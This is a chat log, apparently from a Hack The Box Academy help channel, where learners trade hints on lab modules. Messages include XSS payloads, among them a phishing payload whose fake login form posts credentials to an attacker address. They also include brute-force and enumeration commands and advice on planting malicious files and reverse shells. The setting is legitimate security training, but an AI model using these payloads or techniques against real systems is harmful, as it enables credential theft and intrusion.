Namely, cURL, whatweb, and nmap. None of them were able to enumerate the "Simple Backup Plugin 2.7.10" plugin.
What tool would you have used? Or should I have downloaded a wordpress enumeration script for nmap?
there's a wordpress enum tool
but it's not referred to
poor dude whose wall of text keeps getting yeeted
the script for nmap?
mm okay. so for certain services you need a specialized tool to see the associated plugins. There isn't really a catch-all?
you can fuzz for plugins under the wp-plugins directory
^
with ffuf for example
but again this is getting-started module
so you're not expected to really know all about these tools
yes just continue 😂
and i'm guessing for the sake of not mindflooding new users: they kept it basic
I see, thank you.
tbh @unique finch if all else fails: just use the in-browser pwnbox if you can
it works perfectly fine from there
yep
it seems like you have a grasp what to do: just the tool on your end being st00pid
i dont even want a career in cyber sec, just want to learn more about exploits. more specifically windows kernel exploits
good for gamehacks
eh there's really not many that focus on kernel exploits
idk about the game hacking modules
more so into reversing and intercepting packets
there are many kernel escalation pocs on github
idk if there's many kernel exploit related modules
it will delete it if you use an IP addr
i need help in the SMB module: "Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer." I have used rpcclient, but either I can't see the answer if it's in front of me or I'm issuing the wrong commands. I've used the commands in the module.
the only barely mention of it is in the windows privesc module
hint Samba
Hi all,
don't think my earlier post made it through, not sure why it's not appearing in the thread.
But basically looking to see if anyone was able to provide a nudge/hint for the final question of the ADCS skills assessment.
Tried ESC8/11 to Dev and remote to DC - No good
Tried ESC7 as per the play in the lesson - No luck
Tried enrolling a cert with X (that he has permissions for) and approving with Y (given the group he is part of) - No luck
I feel that ESC7 is the path the assessment wants to go down, but i think im missing a vital step to get me over the line.
because 1) your main account isn't linked
2) your message was so long automod basically treated it as spam
#welcome <- instructions and stuff here
ah, it's prob #2 - went into a bit of detail about what i attempted to help detail what ive tried.
it's both
it's not a or b
it's a AND b
understood. thank you.
also as a note
please refrain from using usernames and such in your requests for assistance
there are lots of pocs that are handy to use, im trying to learn the networking side of things such as packet sniffing etc. kernel esc is a fun topic, if you are interested you can look into efi_driver_access on github by TheCruZ
you can shorthand users as t* or to* if two users share the same first initial
but this delves into convo away from academy modules ;)
@languid pulsar whomst the fuck are you? i didn't give permission to dm :)
it's esc7, enumerate which type of esc7 to use
true, are there no modules for packet interception?
i think there's a wireshark module
¯\_(ツ)_/¯
you know the academy has a search feature right?
i should probably stop using this chat as a gen chat then haha
just passing the time while i get my own pwnbox up and running i guess
I know guys this maybe not the place to ask but
I wanna ask are the pro labs been updated like the scenarios of approaching flags, methods, etc? Because I did rasta labs and dante a while ago and I'm going for Zephyr and if I get stuck maybe try either lab again so just wanna know before I buy the subscription
read #welcome for instructions on linking your account to access the prolabs related channels
Thank you
I've used certipy to identify the vuls, which shows the group that J* is part of (s***t), but also saw that that group doesn't have MA permissions. Is it a case of me working out a way to get that permission assigned to J's account?
you can use another permission for esc7
can see both E* and M--s permissions. Though I've tried to issue a cert from a template that T* could enrol in (didn't see any template that J* could).
check what group J* is in
k thanks. I'll check again now.
this is such the worst website
what a shame; then why are you here
because i clicked next for everything in the tutorial make it easier
anyways i am leaving now
why doesn't it connect?
you don't need sudo for ssh
Vpn connected?
but also ^
Sure
"Sure" isn't a yes/no answer
Yes
em, am I doing something wrong? Currently I'm doing the module Password Attacks / Password Mutation. I downloaded the file, there are 3 files. I mutate the password.list using the custom.rule given in the downloaded files, then I use hydra to try and get the password for the user "sam"? It seems like it's going to take 64hr? Is there something wrong? Any help will be greatly appreciated
don't attack ssh
the username isn't supplied correctly here, there's no need to sudo ssh
username is supplied properly
the prompt for kali was because they used sudo
yeah that's what I meant
Wrong ip
Yes
Sneak peek screenshot
i get it. Sorry ; )
let me try smth else see will it work. thx for the hint! really thought i was going to have to w8 64hr ...
also -t 48

ping that ip
change vpn regions and download a new vpn (close and delete the old one)
also use the tcp
Ok
Thank you, it works
your ping should now also be stable
is there any way to change the background color of htb academy?
not unless you use a browser plugin
i think there's one that some people use called lightreader
thx!
got it? :D
(note ssh is super slow, you should almost never brute force it unless you have to, and even then don't and just cry)
there's a tool that's been mentioned for bruteforcing ssh - called ssb
haven't tried it
i will give it a try. initially i set -t 4 on ssh take 64hr now i set -t 48 and take like 3hr 🙂 haha but seem like attacking ssh just take too long
just try a different protocol

use nmap to find open ports
ty! completely forgotten nmap exist
lol that's what my first hint was pushing towards: don't brute ssh
after using XSS strike to find a payload like '><dEtAiLs%0aontoGGle+=+[8].find(confirm)%0dx//
where do i inject the payload?
if there's somewhere to input text maybe
yea its in the url
but where do i put my payload?
do i put it at the end of that?
'><dEtAiLs%0aontoGGle+=+[8].find(confirm)%0dx//<script>alert(document.cookie)</script>
try using dev tools to just paste it in, or do it how the section described
usually xss is done via a form on the page, but it can be done in url
i am but if i want to put my own script
to do something where do i put it
along with the payload?
no not really
'><a/+/oNMoUsEOVEr+=+(prompt)``><!--document.write('--!><h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove(); anyone know why that doesn't remove the id urlform
xss phishing
html comments don't affect the actual javascript too, right? only what it displays on the web?
is that the one where the question has you upload something to send?
or why does making html comment not affect the code? yes login form
but isn't there a /send or whatever
he comments out a piece of the code on the website using a html comment but it doesnt affect the thing why?
no
likely it wasn't an important piece of code, like a header or something
¯\_(ツ)_/¯
as suggested by the module to understand it better: try viewing page source to see what it's doing
i c but also some of my payload shows up as text how do I remove it if I html comment it out it wont work anymore..
well when you view-source it's gonna show that it injects it in-front of the html code
on a normal view it's not gonna show much
wdym
ik i did it im just trying to make it look nice
document.write('<h3> this bit shows up in white text but how do i remove it
¯\_(ツ)_/¯
you should at least first test it
if you test it as shown: do you get login info
don't worry about it
kk
btw your copy paste shows `` instead of doublequotes here
or singlequotes whatever you're trying to do
thats the way it formatted
wdym
just made it easier to parse the different things for myself
oh i c
using ```html at the top and then closing with ``` underneath it puts it into codeblock
oh i c ok danke
also your URL payload doesn't include the html comment out at the end of the payload? unless that wasn't copy/pasted on here
btw i'd suggest deleting the code block since that's technically how to get the answer
😉
ll
finally solve it ty!
DNS Module : What is the FQDN of the host where the last octet ends with "x.x.x.203"? 1st thing i did is run ||dig axfr inlanefreight.htb @10.129.181.78|| and got ||app.inlanefreight.htb. 604800 IN A 10.129.18.15
dev.inlanefreight.htb. 604800 IN A 10.12.0.1
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 127.0.0.1|| then i ran against each subdomain the 2 commands ||dig axfr app.inlanefreight.htb @10.129.32.216|| and ||dnsenum --dnsserver 10.129.32.216 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --threads 90 app.inlanefreight.htb|| but i cannot get the answer. plz help me
"Dns module" pretty sure that's not the name of it
But you should be fierce with your wordlists
Module btw is Footprinting
can someone help me with xss, the blind xss
i cant <script src="http://ip/script.js">
i post in both inputs but no work at all
I got a question I am very new to hack the box. Should I do hack the box on kali linux (vm) or should I do it on my mac?
Hi can anyone please help me with Injection attacks module - skill assessment? I got to|| xml exfiltration || now I'm stuck.
If you've gotten till there then you're on the right path. From there, it's a matter of adjusting your payload to get just what you want. Check the XPath sections to get more idea.
I think I can get the whole ||xml file|| but I do not see the flag there
Hello everyone, could you give me a little help here? I'm having this issue with xfreerdp since yesterday
I cant make progress in CDSA modules
If it takes more than an hour, then you are doing something wrong
You can't actually see the whole ||xml content from the iframe|| if your payload is just blasting the whole thing. The amount of ||entries in the XML base is huge or should I say the id you need is phenomenal 😶 ||
Well, again you are doing something wrong, none of the exercises takes significant amount of time
If it takes, then change the approach or vector
So, you know the usual flag format for HTB. ||Think how you can have your payload to just search for that format and get just that entry|| @sonic arch
The XPath sections will give you the thing you need for your payload or even some googling will do.
¯\_(ツ)_/¯
Thank you
Also, have you tried getting the source code for the internal application? That should give you a better idea but again, the whole thing logic behind the query isn't complicated and can be done with assumptions of how the query code would look like.
I need help in the module YARA & Sigma for SOC Analysts and other modules that need to use xfreerdp, Its isnt working as it should be, not connecting and having errors
check your credentials, if there is a special character somewhere make sure to use single or double quotes
okay okay
Hi, i used Get-DomainObjectACL command with specific user's SID in real environment, after hours still there is no output, is it how it works and takes too long? 🙂
checked it right now, everything is fine, but I'm still having the same issue 😦
nvm I run it again and for some reason it worked
hi, i have been using the command "crackmapexec smb IP -u jason -P password.list --local-auth" in the attacking smb in attacking common services but i get no results any hints pls ?
it's normal on the password attacks
the bruteforce on smb taking so long?
i'm using metasploit to do so
If there is THREADS option you can increase it
mostly it doesn't take long for me to get the password when brute forcing
Hey guys, I am currently trying to exploit a writable smb share on a domain computer. Can anyone point me to a module in the academy where I can read up on any techniques or procedures to try?
you can plant some malicious files such as, but not limited to, lnk files, library files and others if you are expecting someone to visit it, so you can capture its authentication request. You can also place a malicious binary that could be masked as a legit one and upon execution provide you with a reverse shell. Those are some options that you can think of and eventually excel at
thanks a lot! Do you know if any of these techniques are explained in an academy module? I guess there is no dedicated module for that but worth a shot.
AD Enum & Attacks, CME, NTLMRelaying would have those not all but yea
thanks you very much good Sire
if your problem is relevant to the channel then sure
okayyy
is the academy support working?
jsp
I have a question I want to start a malware analysis lab on kali linux where do I find malware to use it on my vm?
Im stuck right in this module: Hunting Evil with YARA (Windows Edition) can someone help me?
I tried to follow the steps but no results
having trouble with "spawning a target" not working and just hanging (wheel spinning) for more than 5 minutes. I have tried multiple times ... anyone else having this problem?
i had this on password attack a few minutes ago
but i refreshed the page and spawned it again
mine is still acting up.. Thanks
vm's today just dont work as expected
anyone can help me with this error? Write-Output : Parameter cannot be processed because the parameter name 'e' is ambiguous. Possible matches include: -ErrorAction -ErrorVariable.
had this happening last night, refresh and keep trying. It will spawn eventually
my issue?
solved
guys i have an issue in the attacking smb section in attacking common service ... when i try to brute force the user jason on smb using crackmapexec (with --local-auth) or when i try it with metasploit i get no result even though i use the attackbox and the password list from the resources is there anything im not doing right ?
nevermind, i used the password list from the other section lol
Hello, Can i Ask a question about challenge here ?
Someone can help me about "USING CRACKMAPEXEC - Skill Assessment" . Q2?
Best method to copy the tools folder from the AD section? gonna be a big file
It's better to ask in the #challenges channel
I don't have Access to this channel 🥲
Read and follow #welcome
check the shares
ty
hi, same question. Did you figure it out?
👀
Hey guys, do you know if the following Inveigh command is effectively equivalent to running responder (for capturing hashes):
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Alternatively, is it possible to use responder over proxychains somehow?
Hi there, anyone who has tips for the skills assessment 2 in "intro to assembly" please? I got the code (wrong) and a shellcode under 50 bytes with no null bytes but nothing seems to work. I know that the flag on this ex is called "/flg.txt" so it should be ok with a unique register to store. Thanks
not too sure what you're asking here, what do you have problems with?
the original question is "The above server simulates a vulnerable server that we can run our shellcodes on. Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag. (Feel free to find/create a custom shellcode)", i've re-read the shellcode requirement and i optimize the shellcode (it contains no null bytes and is under 50 bytes) but nothing seems to work
easiest way to test it is either through gdb or make a /flg.txt file in your own system and run the binary
also, your shellcode will need to have null byte, you'll need it for the string terminator, and the read syscall number, the shellcode will work as long as they're at the right place
ahhhh ok😇 thanks for the tips, i think i know where's my mistake
AD Enumeration & Attacks: I'm trying to connect via RDP but nothing is loading. I've tried downloading a different VPN file, resetting the machine, adding inlanefriehgt.local to /etc/hosts, and tried Pwnbox but I can't connect to RDP?
hit enter
wtf it worked thanks
After having spent many hours on this topic I was also able to read the index.php file like you show in the Figure. Now I am trying to read bash history files for the lab_adm user as well as files in the .ssh directory. No success. Is there a way to actually get a reverse shell on the linux box (IP = 172.16.5.127)? Thanks.
command inject a url encoded reverse shell oneliner, that's it
let me ask u guys something
topics like SAM and LSASS
are used frequently? cause i'm having a hard timing on that

of course with a cheat sheet i could do it "easily" but understanding the theory is the problem
the reg hives store hashes of local accounts, lsass stores credentials of currently logged in users
thanks, maybe im overthinking the things
i'll try to keep it simple at the beginning, maybe in the future i can dig a little bit deeper
stuck on Nessus Skills Assessment if anyone can help, I am able to login to my personal created account but the credential scan is not working the scan is only lasting <10secs and no results, additionally the provided credentials do not work for me to view the precompiled scan results
how do you expect precompiled results on your machine?
You need to connect to https://ip:nessusport
Ip being the spawned ip
am i suppose to use msf once i have the vulnerability for this one? or am i overthinking it. web proxies -> zap scanner
As the targets are on an internal *172.15-16.x.x
@midnight kindle Do not post spoilers, ie the flag. If you need assistance post your question, but do not post the flag.
you’re overthinking it
my spider senses are tingling
@fathom pendant I am getting error trying to connect to spawned ip with 8834
Https

yes
Can you not click: advanced continue anyway?
only got that when connecting using localhost:8834, does something need to be edited in /hosts?